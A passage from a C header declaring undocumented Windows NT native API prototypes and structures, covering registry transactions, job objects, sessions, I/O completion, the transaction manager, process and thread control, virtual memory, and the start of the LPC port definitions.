POBJECT_ATTRIBUTES TargetKey,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKeyEx(\n    _In_ POBJECT_ATTRIBUTES TargetKey,\n    _In_opt_ HANDLE Event);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeKey(\n    _In_ HANDLE KeyHandle,\n    _In_opt_ HANDLE Event,\n    _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG CompletionFilter,\n    _In_ BOOLEAN WatchTree,\n    _Out_writes_bytes_opt_(BufferSize) PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _In_ BOOLEAN Asynchronous);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockRegistryKey(\n    _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtCreateRegistryTransaction(\n    _Out_ PHANDLE Handle,\n    _In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_*\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ DWORD Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtCommitRegistryTransaction(\n    _In_ HANDLE RegistryHandle,\n    _In_ 
BOOL Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenRegistryTransaction(\n    _Out_ PHANDLE RegistryHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtRollbackRegistryTransaction(\n    _In_ HANDLE RegistryHandle,\n    _In_ BOOL Wait);\n\n\n/************************************************************************************\n*\n* Job API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAssignProcessToJobObject(\n    _In_ HANDLE JobHandle,\n    _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateJobObject(\n    _Out_ PHANDLE JobHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateJobSet(\n    _In_ ULONG NumJob,\n    _In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtIsProcessInJob(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ HANDLE JobHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenJobObject(\n    _Out_ PHANDLE JobHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationJobObject(\n    _In_opt_ HANDLE JobHandle,\n    _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,\n    _Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,\n    _In_ ULONG JobObjectInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationJobObject(\n    _In_ HANDLE JobHandle,\n    _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,\n    _In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,\n    _In_ ULONG JobObjectInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateJobObject(\n    _In_ HANDLE JobHandle,\n    _In_ NTSTATUS ExitStatus);\n\n/************************************************************************************\n*\n* Session 
API.\n*\n************************************************************************************/\n\ntypedef struct _SESSION_OBJECT {\n    KEVENT Event;\n    PVOID SessionGlobal; //MM_SESSION_SPACE ptr\n} SESSION_OBJECT, * PSESSION_OBJECT;\n\n//taken from ph2\n\ntypedef enum _IO_SESSION_EVENT {\n    IoSessionEventIgnore,\n    IoSessionEventCreated,\n    IoSessionEventTerminated,\n    IoSessionEventConnected,\n    IoSessionEventDisconnected,\n    IoSessionEventLogon,\n    IoSessionEventLogoff,\n    IoSessionEventMax\n} IO_SESSION_EVENT;\n\ntypedef enum _IO_SESSION_STATE {\n    IoSessionStateCreated = 1,\n    IoSessionStateInitialized,\n    IoSessionStateConnected,\n    IoSessionStateDisconnected,\n    IoSessionStateDisconnectedLoggedOn,\n    IoSessionStateLoggedOn,\n    IoSessionStateLoggedOff,\n    IoSessionStateTerminated,\n    IoSessionStateMax\n} IO_SESSION_STATE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSession(\n    _Out_ PHANDLE SessionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeSession(\n    _In_ HANDLE SessionHandle,\n    _In_ ULONG ChangeSequenceNumber,\n    _In_ PLARGE_INTEGER ChangeTimeStamp,\n    _In_ IO_SESSION_EVENT Event,\n    _In_ IO_SESSION_STATE NewState,\n    _In_ IO_SESSION_STATE PreviousState,\n    _In_reads_bytes_opt_(PayloadSize) PVOID Payload,\n    _In_ ULONG PayloadSize);\n\n/************************************************************************************\n*\n* IO Completion API.\n*\n************************************************************************************/\n\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS {\n    IoCompletionBasicInformation\n} IO_COMPLETION_INFORMATION_CLASS;\n\ntypedef struct _IO_COMPLETION_BASIC_INFORMATION {\n    LONG Depth;\n} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIoCompletion(\n    _Out_ PHANDLE IoCompletionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n  
  _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG Count);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenIoCompletion(\n    _Out_ PHANDLE IoCompletionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryIoCompletion(\n    _In_ HANDLE IoCompletionHandle,\n    _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\n    _Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation,\n    _In_ ULONG IoCompletionInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIoCompletion(\n    _In_ HANDLE IoCompletionHandle,\n    _In_opt_ PVOID KeyContext,\n    _In_opt_ PVOID ApcContext,\n    _In_ NTSTATUS IoStatus,\n    _In_ ULONG_PTR IoStatusInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIoCompletionEx(\n    _In_ HANDLE IoCompletionHandle,\n    _In_ HANDLE IoCompletionPacketHandle,\n    _In_opt_ PVOID KeyContext,\n    _In_opt_ PVOID ApcContext,\n    _In_ NTSTATUS IoStatus,\n    _In_ ULONG_PTR IoStatusInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRemoveIoCompletion(\n    _In_ HANDLE IoCompletionHandle,\n    _Out_ PVOID *KeyContext,\n    _Out_ PVOID *ApcContext,\n    _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_opt_ PLARGE_INTEGER Timeout);\n\n/************************************************************************************\n*\n* Transactions API.\n*\n************************************************************************************/\n\n//TmTx\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTransaction(\n    _Out_ PHANDLE TransactionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ LPGUID Uow,\n    _In_opt_ HANDLE TmHandle,\n    _In_ ULONG CreateOptions,\n    _In_ ULONG IsolationLevel,\n    _In_ ULONG IsolationFlags,\n    _In_opt_ PLARGE_INTEGER Timeout,\n    _In_opt_ PUNICODE_STRING Description);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTransaction(\n    _Out_ PHANDLE 
TransactionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ LPGUID Uow,\n    _In_opt_ HANDLE TmHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRollbackTransaction(\n    _In_ HANDLE TransactionHandle,\n    _In_ BOOLEAN Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCommitTransaction(\n    _In_ HANDLE TransactionHandle,\n    _In_ BOOLEAN Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreezeTransactions(\n    _In_ PLARGE_INTEGER FreezeTimeout,\n    _In_ PLARGE_INTEGER ThawTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtThawTransactions(\n    VOID);\n\n//TmRm\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateResourceManager(\n    _Out_ PHANDLE ResourceManagerHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ HANDLE TmHandle,\n    _In_opt_ LPGUID ResourceManagerGuid,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG CreateOptions,\n    _In_opt_ PUNICODE_STRING Description);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenResourceManager(\n    _Out_ PHANDLE ResourceManagerHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ HANDLE TmHandle,\n    _In_opt_ LPGUID ResourceManagerGuid,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\n//TmEn\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEnlistment(\n    _Out_ PHANDLE EnlistmentHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ HANDLE ResourceManagerHandle,\n    _In_ HANDLE TransactionHandle,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ ULONG CreateOptions,\n    _In_ NOTIFICATION_MASK NotificationMask,\n    _In_opt_ PVOID EnlistmentKey);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEnlistment(\n    _Out_ PHANDLE EnlistmentHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ HANDLE ResourceManagerHandle,\n    _In_ LPGUID EnlistmentGuid,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\n//TmTm\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTransactionManager(\n    _Out_ PHANDLE TmHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ 
PUNICODE_STRING LogFileName,\n    _In_ ULONG CreateOptions,\n    _In_ ULONG CommitStrength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTransactionManager(\n    _Out_ PHANDLE TmHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ PUNICODE_STRING LogFileName,\n    _In_opt_ LPGUID TmIdentity,\n    _In_ ULONG OpenOptions);\n\n/************************************************************************************\n*\n* Performance Counter.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryPerformanceCounter(\n    _Out_ PLARGE_INTEGER PerformanceCounter,\n    _Out_opt_ PLARGE_INTEGER PerformanceFrequency);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtConvertBetweenAuxiliaryCounterAndPerformanceCounter(\n    _In_ BOOLEAN ConvertAuxiliaryToPerformanceCounter,\n    _In_ PLARGE_INTEGER PerformanceOrAuxiliaryCounterValue,\n    _Out_ PLARGE_INTEGER ConvertedValue,\n    _Out_opt_ PLARGE_INTEGER ConversionError);\n\n/************************************************************************************\n*\n* Process and Thread API.\n*\n************************************************************************************/\n\ntypedef struct _INITIAL_TEB\n{\n    struct\n    {\n        PVOID OldStackBase;\n        PVOID OldStackLimit;\n    } OldInitialTeb;\n    PVOID StackBase;\n    PVOID StackLimit;\n    PVOID StackAllocationBase;\n} INITIAL_TEB, * PINITIAL_TEB;\n\n#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001\n\n#define QUEUE_USER_APC_FLAGS_NONE               0\n#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC   1\n\n//\n// NtCreateProcessEx specific flags.\n//\n#define PS_REQUEST_BREAKAWAY        1\n#define PS_NO_DEBUG_INHERIT         2\n#define PS_INHERIT_HANDLES          4\n#define PS_LARGE_PAGES              8\n#define PS_ALL_FLAGS                (PS_REQUEST_BREAKAWAY | \\\n                                     PS_NO_DEBUG_INHERIT  | \\\n                       
              PS_INHERIT_HANDLES   | \\\n                                     PS_LARGE_PAGES)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetNextProcess(\n    _In_opt_ HANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ ULONG HandleAttributes,\n    _In_ ULONG Flags,\n    _Out_ PHANDLE NewProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetNextThread(\n    _In_ HANDLE ProcessHandle,\n    _In_ HANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ ULONG HandleAttributes,\n    _In_ ULONG Flags,\n    _Out_ PHANDLE NewThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcess(\n    _Out_ PHANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ParentProcess,\n    _In_ BOOLEAN InheritObjectTable,\n    _In_opt_ HANDLE SectionHandle,\n    _In_opt_ HANDLE DebugPort,\n    _In_opt_ HANDLE ExceptionPort);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcessEx(\n    _Out_ PHANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ParentProcess,\n    _In_ ULONG Flags,\n    _In_opt_ HANDLE SectionHandle,\n    _In_opt_ HANDLE DebugPort,\n    _In_opt_ HANDLE ExceptionPort,\n    _In_ BOOLEAN InJob);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateUserProcess(\n    _Out_ PHANDLE ProcessHandle,\n    _Out_ PHANDLE ThreadHandle,\n    _In_ ACCESS_MASK ProcessDesiredAccess,\n    _In_ ACCESS_MASK ThreadDesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes,\n    _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes,\n    _In_ ULONG ProcessFlags,\n    _In_ ULONG ThreadFlags,\n    _In_opt_ PVOID ProcessParameters,\n    _Inout_ PPS_CREATE_INFO CreateInfo,\n    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThread(\n    _Out_ PHANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ProcessHandle,\n    _Out_ PCLIENT_ID ClientId,\n    _In_ 
PCONTEXT ThreadContext,\n    _In_ PINITIAL_TEB InitialTeb,\n    _In_ BOOLEAN CreateSuspended);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThreadEx(\n    _Out_ PHANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ProcessHandle,\n    _In_ PVOID StartRoutine,\n    _In_opt_ PVOID Argument,\n    _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*\n    _In_opt_ ULONG_PTR ZeroBits,\n    _In_opt_ SIZE_T StackSize,\n    _In_opt_ SIZE_T MaximumStackSize,\n    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcess(\n    _Out_ PHANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateProcess(\n    _In_opt_ HANDLE ProcessHandle,\n    _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSuspendProcess(\n    _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResumeProcess(\n    _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcessStateChange(\n    _Out_ PHANDLE ProcessStateChangeHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtChangeProcessState(\n    _In_ HANDLE ProcessStateChangeHandle,\n    _In_ HANDLE ProcessHandle,\n    _In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,\n    _In_opt_ PVOID ExtendedInformation,\n    _In_opt_ SIZE_T ExtendedInformationLength,\n    _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSuspendThread(\n    _In_ HANDLE ThreadHandle,\n    _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResumeThread(\n    _In_ HANDLE ThreadHandle,\n    _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThreadStateChange(\n    _Out_ PHANDLE ThreadStateChangeHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ 
POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE ThreadHandle,\n    _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtChangeThreadState(\n    _In_ HANDLE ThreadStateChangeHandle,\n    _In_ HANDLE ThreadHandle,\n    _In_ THREAD_STATE_CHANGE_TYPE StateChangeType,\n    _In_opt_ PVOID ExtendedInformation,\n    _In_opt_ SIZE_T ExtendedInformationLength,\n    _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThread(\n    _Out_ PHANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateThread(\n    _In_opt_ HANDLE ThreadHandle,\n    _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtImpersonateThread(\n    _In_ HANDLE ServerThreadHandle,\n    _In_ HANDLE ClientThreadHandle,\n    _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetContextThread(\n    _In_ HANDLE ThreadHandle,\n    _In_ PCONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetContextThread(\n    _In_ HANDLE ThreadHandle,\n    _Inout_ PCONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationThread(\n    _In_ HANDLE ThreadHandle,\n    _In_ THREADINFOCLASS ThreadInformationClass,\n    _Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation,\n    _In_ ULONG ThreadInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationThread(\n    _In_ HANDLE ThreadHandle,\n    _In_ THREADINFOCLASS ThreadInformationClass,\n    _In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation,\n    _In_ ULONG ThreadInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationProcess(\n    _In_ HANDLE ProcessHandle,\n    _In_ PROCESSINFOCLASS ProcessInformationClass,\n    _Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,\n    _In_ ULONG ProcessInformationLength,\n    _Out_opt_ PULONG 
ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationProcess(\n    _In_ HANDLE ProcessHandle,\n    _In_ PROCESSINFOCLASS ProcessInformationClass,\n    _In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation,\n    _In_ ULONG ProcessInformationLength);\n\ntypedef VOID(*PPS_APC_ROUTINE) (\n    _In_opt_ PVOID ApcArgument1,\n    _In_opt_ PVOID ApcArgument2,\n    _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThread(\n    _In_ HANDLE ThreadHandle,\n    _In_ PPS_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcArgument1,\n    _In_opt_ PVOID ApcArgument2,\n    _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThreadEx(\n    _In_ HANDLE ThreadHandle,\n    _In_opt_ HANDLE ReserveHandle,\n    _In_ PPS_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID ApcArgument1,\n    _In_opt_ PVOID ApcArgument2,\n    _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThreadEx2(\n    _In_ HANDLE ThreadHandle,\n    _In_ HANDLE UserApcReserveHandle,\n    _In_ ULONG QueueUserApcFlags, /*QUEUE_USER_APC_FLAGS*/\n    _In_ PPS_APC_ROUTINE ApcRoutine,\n    _In_opt_ PVOID SystemArgument1,\n    _In_opt_ PVOID SystemArgument2,\n    _In_opt_ PVOID SystemArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtYieldExecution(\n    VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTestAlert(\n    VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertThread(\n    _In_ HANDLE ThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertResumeThread(\n    _In_ HANDLE ThreadHandle,\n    _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertThreadByThreadId(\n    _In_ HANDLE ThreadId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForAlertByThreadId(\n    _In_ PVOID Address,\n    _In_opt_ PLARGE_INTEGER Timeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDelayExecution(\n    _In_ BOOLEAN Alertable,\n    _In_opt_ PLARGE_INTEGER DelayInterval);\n\nNTSYSAPI\nULONG\nNTAPI\nNtGetCurrentProcessorNumber(\n    
VOID);\n\n/************************************************************************************\n*\n* License API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryLicenseValue(\n    _In_ PUNICODE_STRING ValueName,\n    _Out_opt_ PULONG Type,\n    _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data,\n    _In_ ULONG DataSize,\n    _Out_ PULONG ResultDataSize);\n\n/************************************************************************************\n*\n* Virtual Memory API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress,\n    _In_ ULONG_PTR ZeroBits,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG AllocationType,\n    _In_ ULONG Protect);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateVirtualMemoryEx(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG AllocationType,\n    _In_ ULONG PageProtection,\n    _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n    _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreeVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID *BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG FreeType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,\n    _Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation,\n    _In_ SIZE_T MemoryInformationLength,\n    _Out_opt_ PSIZE_T 
ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,\n    _In_ ULONG_PTR NumberOfEntries,\n    _In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses,\n    _In_reads_bytes_(VmInformationLength) PVOID VmInformation,\n    _In_ ULONG VmInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _Out_writes_bytes_(BufferSize) PVOID Buffer,\n    _In_ SIZE_T BufferSize,\n    _Out_opt_ PSIZE_T NumberOfBytesRead);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadVirtualMemoryEx(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _Out_writes_bytes_(BufferSize) PVOID Buffer,\n    _In_ SIZE_T BufferSize,\n    _Out_opt_ PSIZE_T NumberOfBytesRead,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _In_reads_bytes_(BufferSize) PVOID Buffer,\n    _In_ SIZE_T BufferSize,\n    _Out_opt_ PSIZE_T NumberOfBytesWritten);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtProtectVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID *BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG NewProtect,\n    _Out_ PULONG OldProtect);\n\n#define MAP_PROCESS 1L\n#define MAP_SYSTEM  2L\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID *BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG MapType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnlockVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID *BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _In_ ULONG MapType);\n\nNTSTATUS\nNTAPI\nNtFlushVirtualMemory(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PVOID* BaseAddress,\n    _Inout_ PSIZE_T RegionSize,\n    _Out_ struct _IO_STATUS_BLOCK* IoStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushInstructionCache(\n    _In_ HANDLE 
ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _In_ SIZE_T Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePagingFile(\n    _In_ PUNICODE_STRING PageFileName,\n    _In_ PLARGE_INTEGER MinimumSize,\n    _In_ PLARGE_INTEGER MaximumSize,\n    _In_ ULONG Priority);\n\n/************************************************************************************\n*\n* Port API.\n*\n************************************************************************************/\n\ntypedef struct _PORT_VIEW {\n\n    ULONG  Length;                      // Size of this structure\n    HANDLE SectionHandle;               // Handle to section object with\n                                        // SECTION_MAP_WRITE and SECTION_MAP_READ\n    ULONG  SectionOffset;               // The offset in the section to map a view for\n                                        // the port data area. The offset must be aligned \n                                        // with the allocation granularity of the system.\n    SIZE_T ViewSize;                    // The size of the view (in bytes)\n    PVOID  ViewBase;                    // The base address of the view in the creator\n                                        // \n    PVOID  ViewRemoteBase;              // The base address of the view in the process\n                                        // connected to the port.\n} PORT_VIEW, * PPORT_VIEW;\n\ntypedef struct _REMOTE_PORT_VIEW {\n\n    ULONG  Length;                      // Size of this structure\n    SIZE_T ViewSize;                    // The size of the view (bytes)\n    PVOID  ViewBase;                    // Base address of the view\n\n} REMOTE_PORT_VIEW, * PREMOTE_PORT_VIEW;\n\ntypedef struct _PORT_MESSAGE {\n    union {\n        struct {\n            CSHORT DataLength;\n            CSHORT TotalLength;\n        } s1;\n        ULONG Length;\n    } u1;\n    union {\n        struct {\n            CSHORT Type;\n            CSHORT DataInfoOffset;\n        } s2;\n        ULONG ZeroInit;\n    } u2;\n 
